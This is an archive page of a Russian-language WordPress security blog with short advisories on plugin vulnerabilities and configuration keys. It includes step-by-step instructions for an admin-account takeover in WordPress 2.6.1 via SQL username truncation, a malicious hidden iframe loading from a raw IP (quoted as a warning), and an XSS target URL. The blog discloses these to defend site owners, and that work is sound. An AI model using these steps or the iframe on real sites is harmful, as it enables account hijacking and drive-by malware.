Author Archive
Уязвимости в плагинах Media Holder и e-Commerce
Найдены уязвимости в WordPress-плагинах Media Holder и E-Commerce. На обе уязвимости уже выпущены эксплоиты, которые могут использоваться для нарушения безопасности Вашего блога. Плагин Media Holder предназначен для размещения в блоге различных медиа-данных, видео, аудио и тп. Плагин e-Commerce используется для создания интернет-магазина на основе вашего WordPress-блога. Уязвимость в плагине WordPress Media Holder связана с ошибкой читать далее ..
Уязвимость SQL-инъекции в плагине WP Comment Remix
Найдена уязвимость в плагине WordPress - WP Comment Remix. Плагин предназначается для улучшения функций комментирования. Позволяет добавить функции цитирования и ответа на комментарии. На эту уязвимость уже написан эксплоит, который позволяет извлечь из блога-жертвы очень много, важных данных, таких как: Настройки блога и активные плагины Список пользователей блога Список администраторов блога Сам эскплоит можно скачать читать далее ..
Уязвимость усечения данных в SQL WordPress 2.6.1
Найдена новая уязвимость в WordPress 2.6.1 которая заключается в ошибке усечения данных в базе SQL. Идем по ссылке server.com/wp-login.php?action=register Регистрируемся как пользователь "admin x" и Ваш email Логин выглядит как admin[55 пробелов]х После регистрации дубликата логина администратора, идем по ссылке восстановления пароля: server.com/wp-login.php?action=lostpassword В форме восстановления пароля вводим email на который регистрировали дубликат логина администратора. читать далее ..
Уязвимости в Contact Form ][ для WordPress
Найдена уязвимость в плагинах контактной формы WordPress - Contact Form версии 2.0.13 и ниже. Плохая защита от ботов: отсутствие капчи, позволяет спам-ботам отправлять неограниченное количество спам-сообщений администратору сайта. Использование функционала для рассылки спама: в форме контактов есть поле которое называется "Отправить копию самому себе", это настраивается в настройках плагина (CarbonCopy Ability), используя это поле, спам читать далее ..
Секретные ключи в WordPress 2.6
Продолжая тему о уязвимости секретного ключа в файле конфигурации WordPress, хочу обратить ваше внимание на то, что в новой версии WordPress 2.6, кроме строчки “SECRET_KEY“ есть еще две, на которые также необходимо обращать внимание при установке или обновлении WordPress блога. Строчки эти выглядят вот так: define('AUTH_KEY', 'впишите сюда уникальную фразу'); // Измените на уникальную фразу. читать далее ..
Внимание вирус!
Вчера на одном из сайтов заказчиков, был обнаружен код, который определяется Google как вирусный код, все сайты которые содержат эту строчку, попадают сразу в категорию опасных сайтов, поэтому будьте внимательны и проверьте файлы своего сайта и посты, на наличие подобного кода. <!-- Traffic Statistics --> <iframe src=хттп://61.155.8.157/iframe/wp-stats.php width=1 height=1 frameborder=0></iframe> <!-- End Traffic Statistics --> читать далее ..
Уязвимость WordPress Plugin Download Manager 0.2
Уязвимость в данном скрипте, дает возможность атакующему закачать любой файл, на сервер. Это становится возможным из-за ошибки проверки входных данных в файле upload.php. Исправления данной ошибки пока не существует, возможно будет выпущен патч, или ошибка будет исправлена в следующей версии WordPress. Пример использования данной уязвимости.
WordPress 2.6 – еще больше безопасности
Вышла новая версия лучшего движка для блогов - WordPress 2.6. В новой версии исправлено очень много ошибок и уязвимостей, а также проделано много работы для повышения безопасности блога. Теперь после установки WordPress на новый блог, по умолчанию протокол удаленной работы с блогом XML-RPC отключен, до тех пор, пока администратор блога не активирует его в настройках. читать далее ..
XSS уязвимость плагина Nextgen gallery
В плагине Nextgen Gallery, версии <= 0.96 была найдена уязвимость XSS Злоумышленник, может без авторизации использовать следующий скрипт: http://[host]/[directory]/wp-admin/admin.php?page=nggallery-manage-gallery Насколько известно, исправлений в данный момент не существует.
Уязвимость секретного ключа в wordpress 2.5
Очень важно при обновлении или установке WordPress обратить внимание на параметр "SECRET_KEY", с этим параметром связана безопасность паролей в вашем блоге. В новых версиях WordPress этот ключ стали использовать для усиления алгоритма криптования паролей md5, поэтому очень важно иметь в качестве этого параметра какую-то длинную строчку с различными символами, дабы усложнить процесс расшифровки вашего пароля, читать далее ..
